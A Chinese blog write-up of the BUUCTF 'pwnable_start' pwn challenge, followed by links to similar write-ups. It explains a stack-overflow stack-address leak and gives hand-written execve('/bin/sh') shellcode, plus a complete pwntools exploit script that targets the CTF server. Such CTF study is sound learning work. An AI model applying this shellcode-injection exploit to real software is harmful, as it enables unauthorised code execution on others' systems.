[BUUCTF]刷题:pwnable_start

已于 2022-07-06 10:52:48 修改
阅读量341 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: BUUCTF_Pwn shellcode刷题合集 文章标签: 安全
于 2022-07-06 10:49:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zyxx_wjc/article/details/125634704
博主国赛初赛失利,意识到自己对shellcode生疏,之后因转专业考试未练习,现打算集中研究。以BUU上的题为例,分析题目,利用栈溢出漏洞泄露栈上数据地址,将shellcode写入,强调需自己编写shellcode,最后拿到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

国赛初赛是一个月前的事了,菜鸡的队伍被学校的学长们暴打,初赛pwn题的shellcode题就让我感觉到自己对于shellcode还是有点生疏——水平仅限于用pwntools自带的shellcode。之后的一个月因为要转专业忙于期末考试,也没能练习,这段时间打算集中精力找点shellcode题研究研究。

先来BUU上的这道题,题倒不算难......

 checksec一下发现NX没开,估摸着是道shellcode题。扔进IDA里面发现不能F5,但是汇编较为简单。前面是一个欢迎语的write和一个0x3c的read。

话说这里不知道是什么情况并没有用到ebp,只用了esp,有大佬知道的话还请在评论区普及一下。

 再往下就是退出函数了,没啥东西。

我们要注意0x08048060处的指令:将esp压入栈中,这使得我们可以通过泄露栈中数据来获得栈上数据地址。而图示汇编有输入和输出的功能,可以用于泄露。

我们注意到当程序执行完0x8084809c处的ret之后,此时栈顶就是我们之前压栈的esp值,而由于这里的read有一个栈溢出漏洞,我们可以控制程序返回执行0x08048087将此时栈顶内容打印出来,这样我们就知道了栈上数据的地址。再利用下面的输入功能把shellcode写进去即可得到shellcode。

常用的手法是把"/bin/sh"压进栈中,用xor置零把ecx和edx清零,然后将esp的值赋给ebx,在令eax为0xb,最后计算出来shellcode所在的地址,并将其填入函数返回地址。

需要注意的是pwntools自带的shellcode功能生成的shellcode过长,在这里不适用,shellcode需要自己编写。shellcode就是一段执行execve(“/bin/sh”,0,0)的代码,32位下就是要将eax设为0xb,将ebx设为"/bin/sh"的地址,再将ecx和edx置零即可。

exp:

from pwn import *

e=ELF('/home/wjc/Desktop/start')

context.arch=e.arch
context.terminal=['tmux','splitw','-h']

#r=process('/home/wjc/Desktop/start')
r=remote("node4.buuoj.cn",26341)

shellcode=asm("\
                xor edx,edx;\
                xor ecx,ecx;\
                push 0x0068732f;\
                push 0x6e69622f;\
                mov ebx,esp;\
                mov eax,0xb;\
                int 0x80;\
                ")

r.recvuntil("Let's start the CTF:")
pay1=0x14*'a'+p32(0x8048087)
r.send(pay1)
esp_addr=u32(r.recv(4))
print('esp->',hex(esp_addr))

r.recv()
pay2='b'*20+p32(esp_addr+20)+shellcode
r.sendline(pay2)


r.interactive()

最后即可拿到flag:

BUUCTF pwnable_start
BengDouLove的博客
05-01 431
程序只有这么点代码,稍微分析一下 esp入栈,返回地址入栈(这里直接返回到exit函数,就退出程序了) 清空四个寄存器 这些东西被入栈,不知道是什么,往下看 这里调用了write函数,在汇编当中调用write函数的形式和寄存器是这样的 wtite ( fd , addr , length ) 三个参数对应的寄存器为 ebx ecx edx 将esp赋值给了ecx,说明要打...
BUUCTF-pwn记录(22-7-30更新)
Morphy_Amo的博客
03-04 4462
BUUCTF记录
[BUUCTF]PWN——pwnable_start
mcmuyanga的博客
12-05 1431
pwnable_start 附件 步骤: 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法 本地试运行一下,看看程序大概的情况 32位ida载入,没法f5,好在汇编不长,看得懂 一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了 write(1,buf,0x14) read
BUUCTF--pwnable_start1
qq_30528603的博客
01-06 453
主要就2个功能,通过系统调用来执行读写功能,将字符串Let's start the CTF:输出,然后接收用户输入。也就是我们能刚好覆盖到返回地址,但是我的shellcode有0x18个字节。而且我们惊奇的发现,这两个值相差0x4,因此我们需要通过write函数将他泄露出来,紧着这我们的返回地址就有了,步骤shellocode就是要返回到布局的栈地址处执行。此时esp要索引到返回地址,将直接执行add esp,14h。存在栈溢出,那么这的想法就是直接ret2shellcode了。
关于BUUCTF之“pwnable_start”的一点小结
Probeginner的博客
12-07 407
之前这个用汇编代码编写shellcode题目做的较少,这算是开端。 正常检查程序保护,啥也没开。 我们先分析一波程序: 需要用到一点汇编知识,总的意思是:四个xor清零四个寄存器。而后压栈数据,是最开始会输出的“Let’s start the CTF:”然后调用write函数输出上面内容0x14个字节。而后调用read函数输入最大0x3c字节内容。在add esp ;然后返回。 我们选择shellcode在栈上执行办法。所以我们需要泄露栈地址,计算偏移量,覆盖返回地址为shellcode所在地址 .
BUUCTF-PWN记录-22
weixin_44145820的博客
05-18 790
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
BUUCTF pwn 四月
coco的博客
04-07 933
BUUCTF四月 [OGeek2019]bookmanager 这道程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
CTF解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1566
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4281
记第一篇pwn的做心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
pwnable_start
pondzhang的专栏
03-13 396
from pwn import * loacl_elf = ELF("./start") context.arch = loacl_elf.arch #p = process("./start") p = remote("node3.buuoj.cn",28802) #gdb.attach(p, 'b* 0x08048060') #shellcode=asm(shellcraft.sh()) shellcode = asm("xor ecx,ecx;\ xor edx,.
pwnable_start | Buuoj Pwn
最新发布
ULGANOY的博客
08-15 220
buuoj的pwnable_start题目记录
pwnable_start(write up)
m0_73756460的博客
01-19 242
buu pwnable_start(write up)
pwnable.tw-start
qq_35661990的博客
10-05 1032
参考了好多文章才能大致理解shellcode开始就有一个大坑 可以看到不同的checksec查看start文件会有不同的结果,就结果而言,GDB-PEDA的checksec很不靠谱。。我根本没有s命名的文件。。 所以,start是一个32位没有开启NX的程序,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行...
【pwn】pwnable_start --只有read和write函数的getshell
question55的博客
02-04 1045
addrlenfd'<'LINUX -
pwnable.tw 第一start
像初雪一样自由洒落
04-26 632
今天学长布置了作业,,,做这道,,, 言承这次遇到的第一个情况,,,就是页面打开了,题目出不来。作为一名安全一份子,一直不会访问外网,流泪。 趁着这次机会,搞定了,参考博客:https://www.wonxun.net/share/444 然后我们来看 32位的程序,程序什么也没开,,,感觉挺友善的哈 执行效果,,挺好就一个输入点,基本猜测就是栈溢出,,, 用id...
buu pwnable_start 详解
m0_74172100的博客
07-11 228
这里是不是使得 ret (返回地址)成为了新栈的内容,因此利用题目自带的write函数 将ret(返回地址)填入 p32(0x0804808),然后执行 mov ecx,esp。#使esp(栈顶)增加了0x14字节,ebp没改变,使用的内平栈,没有ebp,覆盖完buf后就是ret,从ret开始就是一个新的栈。之前加上一个push ecx 还是因为 add esp,14h ,使得 ret (返回地址)成为了新栈的内容,所以使用 push ecx ,使 esp-4 跳过 ret的地址。
BUUCTFpwnable_orw
qq_44768749的博客
08-27 1800
BUUCTFpwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值